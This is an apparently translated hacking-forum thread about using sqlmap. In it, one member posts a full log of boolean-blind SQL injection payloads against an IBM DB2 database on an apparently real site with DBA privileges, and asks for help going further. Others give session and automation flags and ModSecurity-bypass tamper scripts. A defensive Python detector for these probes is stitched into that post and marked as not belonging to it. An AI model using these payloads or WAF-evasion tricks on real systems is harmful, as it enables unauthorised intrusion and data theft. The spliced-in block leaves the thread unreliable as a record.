Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. cna

    cna New Member

    Joined:
    10 Feb 2018
    Messages:
    10
    Likes Received:
    0
    Reputations:
    1
    I think that if the privileges are fine, then in my opinion you can't upload only if it's unclear why it doesn't give the path to the special folder outside the root; you'd need an include or some other way to go further from there) and from somewhere

    I wonder, has MySQL still not learned to somehow do anything from the designated folder?)
    well, here you either bypass execution or you need to figure out how this option can be bypassed)
     
  2. Sentureg

    Sentureg New Member

    Joined:
    31 Jul 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Help me get further with this site
    Parameter: SiteId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Vector: AND [INFERENCE]


    Code:
    [14:07:25] [INFO] the back-end DBMS is IBM DB2
    back-end DBMS: IBM DB2
    [14:07:25] [INFO] fetching current user
    [14:07:25] [PAYLOAD] 200001
    [14:07:25] [INFO] retrieving the length of query output
    [14:07:25] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'PPkh'='PPkh
    [14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'PPkh'='PPkh
    [14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'PPkh'='PPkh
    [14:07:28] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'PPkh'='PPkh
    [14:07:29] [INFO] retrieved:
    [14:07:29] [DEBUG] performed 4 queries in 3.84 seconds
    [14:07:29] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'PPkh'='PPkh
    [14:07:30] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'PPkh'='PPkh
    [14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'PPkh'='PPkh
    [14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'PPkh'='PPkh
    [14:07:34] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'PPkh'='PPkh
    [14:07:36] [INFO] retrieved:
    [14:07:36] [DEBUG] performed 9 queries in 10.87 seconds
    current user:   None
    [14:07:36] [INFO] testing if current user is DBA
    current user is DBA:    True
    [14:07:36] [WARNING] schema names are going to be used on IBM DB2 for enumeration as the counterpart to database names on other DBMSes
    [14:07:36] [INFO] fetching database (schema) names
    [14:07:36] [INFO] fetching number of databases
    [14:07:36] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(66) AND 'MrxP'='MrxP
    [14:07:39] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(97) AND 'MrxP'='MrxP
    [14:07:42] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(101) AND 'MrxP'='MrxP
    [14:07:43] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(119) AND 'MrxP'='MrxP
    [14:07:44] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(120) AND 'MrxP'='MrxP
    [14:07:45] [INFO] retrieved:
    [14:07:45] [DEBUG] performed 5 queries in 8.49 seconds
    [14:07:45] [ERROR] unable to retrieve the number of databases
    [14:07:45] [INFO] falling back to current database
    [14:07:45] [INFO] fetching current database
    [14:07:45] [INFO] retrieving the length of query output
    [14:07:45] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'SSnj'='SSnj
    [14:07:46] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'SSnj'='SSnj
    [14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'SSnj'='SSnj
    [14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'SSnj'='SSnj
    [14:07:48] [INFO] retrieved:
    [14:07:48] [DEBUG] performed 4 queries in 3.55 seconds
    [14:07:48] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'SSnj'='SSnj
    [14:07:49] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'SSnj'='SSnj
    [14:07:51] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'SSnj'='SSnj
    [14:07:54] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'SSnj'='SSnj
    [14:07:55] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'SSnj'='SSnj
    [14:07:59] [INFO] retrieved:
    [14:07:59] [DEBUG] performed 9 queries in 13.88 seconds
    [14:07:59] [WARNING] on IBM DB2 you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
    [14:07:59] [CRITICAL] unable to retrieve the database names
    
    [*] shutting down at 14:07:59
    tried --hex, --no-cast, doesn't help
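A defender-side complement to the log above, as an added example that is not part of the post or of sqlmap: a small Python detector that recognizes sqlmap's DB2 boolean-blind probes (the SUBSTR((SELECT ...),n,1)>CHR(k) AND 'tag'='tag shape) in a request log and flags a parameter whose CHR() threshold changes across requests, which is the bisection that extracts one character of the query output at a time. The log format (ip method path body) and every line in it are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample request log (ip method path body); the SiteId payloads copy the
# shape of the DB2 boolean-blind probes sqlmap printed in the post above.
SAMPLE_LOG = [
    "10.0.0.5 POST /search SiteId=200001",
    "10.0.0.5 POST /search SiteId=200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'PPkh'='PPkh",
    "10.0.0.5 POST /search SiteId=200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'PPkh'='PPkh",
    "10.0.0.5 POST /search SiteId=200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'PPkh'='PPkh",
    "10.0.0.5 POST /search SiteId=200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'PPkh'='PPkh",
    "10.0.0.9 POST /search SiteId=300",
]

# One sqlmap-style inference: SUBSTR((SELECT ...),pos,1)>CHR(n) AND 'tag'='tag
INFERENCE = re.compile(
    r"' AND SUBSTR\(\((SELECT .+?)\),(\d+),1\)>CHR\((\d+)\) AND '(\w+)'='\4$"
)


def parse_line(line):
    """Split 'ip method path body' and decode the form body into a dict."""
    ip, method, path, body = line.split(" ", 3)
    params = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        params[name] = unquote_plus(value)
    return ip, method, path, params


def detect_blind_probes(lines):
    """Group inference payloads by source, parameter, probed query and character
    position; a group whose CHR() threshold varies is a bisection search."""
    probes = defaultdict(list)
    for line in lines:
        ip, _, _, params = parse_line(line)
        for name, value in params.items():
            m = INFERENCE.search(value)
            if m:
                key = (ip, name, m.group(1), int(m.group(2)))
                probes[key].append(int(m.group(3)))
    findings = []
    for (ip, name, query, pos), thresholds in probes.items():
        findings.append({
            "source": ip, "parameter": name, "position": pos, "query": query,
            "thresholds": sorted(set(thresholds)),
            "bisection": len(set(thresholds)) >= 2,
        })
    return findings
```

Even a single matching request is worth an alert; the bisection flag just separates a one-off probe from an enumeration that is already running.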
     
  3. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Good day everyone, I'm using sqlmap on Kali; as far as I know, the scan is written to a log, and on a repeated scan sqlmap takes the previous results from the log. Please tell me, how do I clear the log? I couldn't find the output folder.
     
  4. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,804
    Likes Received:
    14,187
    Reputations:
    116
    @aZohan

    usually

    file:///home folder/.sqlmap/output
     
  5. h3xp1017

    h3xp1017 Member

    Joined:
    28 Oct 2015
    Messages:
    85
    Likes Received:
    29
    Reputations:
    1
    session.sqlite

    no?
     
  6. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Do you mean the previous session? I didn't quite understand you. Here's another thought: I'm using the preinstalled sqlmap; maybe it would be better to clone it from git?
     
  7. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    --flush-session Flush session files for current target
    --fresh-queries Ignore query results stored in session file
    Look into the manual more often
     
    dmax0fw likes this.
  8. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Good day everyone! In your opinion, which is better to use: the preinstalled sqlmap in Kali Linux, or is it better to clone it from github?
     
  9. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    496
    Reputations:
    154
    apt-get update && apt-get upgrade && apt-get dist-upgrade
     
    _________________________
    #729 SooLFaa, 30 Aug 2018
    Last edited: 30 Aug 2018
  10. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    106
    Likes Received:
    128
    Reputations:
    46
    and why run all of that in the background?:)
     
  11. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    496
    Reputations:
    154
    The second ampersand got collapsed.
     
    _________________________
  12. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Thanks for the reply. Every day I run the following commands: sudo apt update, sudo apt upgrade. Is there no difference between the commands sudo apt upgrade, sudo apt full-upgrade and sudo apt dist-upgrade?
     
  13. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    496
    Reputations:
    154
    There is a difference, but not in this case.
     
    _________________________
  14. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    52
    Likes Received:
    5
    Reputations:
    0
    Guys, sorry for the dumb question

    is it possible to tell sqlmap via the command
    --batch to answer "N" by itself at first, but if there is a crit on connection, from the dump, to answer "Y" by itself
     
  15. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    --answers=ANSWERS Set question answers (e.g. "quit=N,follow=N")
    There are loads of different answer conditions there!
    Example:
    --batch --answers="keep testing=Y,sitemap=Y,skip further tests=N"
     
    #735 cat1vo, 4 Sep 2018
    Last edited: 4 Sep 2018
    panic.ker, dmax0fw and Xsite like this.
  16. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    52
    Likes Received:
    5
    Reputations:
    0
    Thanks :) that's much simpler )
     
  17. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Good day everyone, can anyone suggest which tamper works against this WAF: "[CRITICAL] WAF/IPS/IDS identified as 'ModSecurity: Open Source Web Application Firewall (Trustwave)'"
    Thanks in advance.
     
  18. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    Try:
    Code:
    --tamper "modsecurityzeroversioned.py"
     
  19. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    I'll try these:
    modsecurityversioned.py surrounds the full query with comments
    modsecurityzeroversioned.py surrounds the full query with comments and a "0"
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    In general, what tampers do and how they work can be seen in sqlmap's tamper folder; it often happens that the set doesn't have the one you need, so you study how the WAF works, create your own tamper and put it in that folder, then just enable it.
     
    _________________________
    RWD, cat1vo and crlf like this.